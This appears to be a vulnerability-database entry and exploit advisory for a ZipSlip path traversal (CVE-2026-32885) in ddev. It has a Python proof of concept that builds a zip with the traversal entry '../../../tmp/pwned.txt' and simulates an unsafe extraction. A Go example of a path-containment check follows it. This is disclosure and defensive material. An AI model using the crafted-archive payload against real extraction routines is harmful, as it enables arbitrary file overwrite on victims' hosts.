| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-32885 | 22 Apr 2026 16:54 | – | attackerkb |
| ddev path traversal vulnerability | 22 Apr 2026 00:00 | – | cnnvd |
| CVE-2026-32885 | 22 Apr 2026 16:54 | – | cve |
| CVE-2026-32885 DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 2026 16:54 | – | cvelist |
| EUVD-2026-25049 | 22 Apr 2026 19:06 | – | euvd |
| DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 2026 19:06 | – | github |
| CVE-2026-32885 | 22 Apr 2026 17:16 | – | nvd |
| GHSA-X2XQ-QHJF-5MVG DDEV has ZipSlip path traversal in tar and zip archive extraction | 22 Apr 2026 19:06 | – | osv |
| ddev/ddev ZipSlip Path Traversal | 24 Mar 2026 00:00 | – | packetstorm |
| PT-2026-34524 | 22 Apr 2026 00:00 | – | ptsecurity |
==================================================================================================================================
| # Title : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A ZipSlip path traversal vulnerability exists in the archive extraction routines of the ddev/ddev project.
A crafted ZIP archive can cause files to be written outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
[+] POC :
```python
#!/usr/bin/env python3
import zipfile
import os

OUTPUT_ZIP = "exploit.zip"
PAYLOAD_PATH = "../../../tmp/pwned.txt"   # entry name carrying traversal components
PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"


def create_malicious_zip():
    # zipfile.writestr stores the entry name verbatim, "../" included
    print("[*] Creating malicious ZIP...")
    with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
    print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
    print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")


def simulate_vulnerable_extract(dest):
    """
    Simulates vulnerable ddev behavior
    (filepath.Join without validation)
    """
    print(f"\n[*] Simulating vulnerable extraction to: {dest}")
    with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
        for file in z.infolist():
            # the entry name is joined onto dest with no containment check
            extracted_path = os.path.join(dest, file.filename)
            print(f"[!] Writing to: {extracted_path}")
            os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
            with open(extracted_path, "wb") as f:
                f.write(z.read(file.filename))


def check_result():
    # ./safe_extract/../../../tmp resolves to /tmp only when the working
    # directory sits two levels below /
    target = "/tmp/pwned.txt"
    print("\n[*] Checking result...")
    if os.path.exists(target):
        print(f"[+] SUCCESS: File written Off the track: {target}")
        with open(target) as f:
            print("[+] Content:", f.read())
    else:
        print("[-] Exploit failed")


if __name__ == "__main__":
    create_malicious_zip()
    safe_dir = "./safe_extract"
    os.makedirs(safe_dir, exist_ok=True)
    simulate_vulnerable_extract(safe_dir)
    check_result()
```
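The check the vulnerable `filepath.Join` pattern lacks, as an added Go example that is neither ddev's code nor part of the advisory: `SafeJoin` verifies containment after joining (rejecting absolute names and a bare `..` as well as `../` prefixes, so it goes a little beyond the single payload in the POC), `ScanZip` lists the escaping entries so an archive can be refused before anything is written, and `MakeZip` builds a constructed sample archive; all three names are hypothetical.

```go
package main
import (
	"archive/zip"
	"bytes"
	"errors"
	"path/filepath"
	"strings"
)

// ErrZipSlip marks an archive entry whose path would land outside dest.
var ErrZipSlip = errors.New("archive entry escapes destination directory")
// SafeJoin adds the containment check that filepath.Join alone does not give.
func SafeJoin(dest, name string) (string, error) {
	dest = filepath.Clean(dest)
	if filepath.IsAbs(name) { // "/etc/passwd" style entries are rejected outright
		return "", ErrZipSlip
	}
	target := filepath.Join(dest, name) // cleans "../" but may leave dest
	rel, err := filepath.Rel(dest, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrZipSlip
	}
	return target, nil
}

// ScanZip lists every entry of an in-memory zip that would escape dest.
func ScanZip(data []byte, dest string) ([]string, error) {
	r, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil && !errors.Is(err, zip.ErrInsecurePath) { // reader still usable on ErrInsecurePath
		return nil, err
	}
	var bad []string
	for _, f := range r.File {
		if _, err := SafeJoin(dest, f.Name); err != nil {
			bad = append(bad, f.Name)
		}
	}
	return bad, nil
}
// MakeZip builds a constructed sample archive; like zipfile.writestr in the POC, Create stores names unvalidated.
func MakeZip(entries [][2]string) []byte {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	for _, e := range entries {
		f, _ := w.Create(e[0])
		f.Write([]byte(e[1]))
	}
	w.Close()
	return buf.Bytes()
}
```

`ScanZip` tolerates `zip.ErrInsecurePath`, which `archive/zip` only raises when `GODEBUG=zipinsecurepath=0` is set, so the scan behaves the same under either setting.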
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================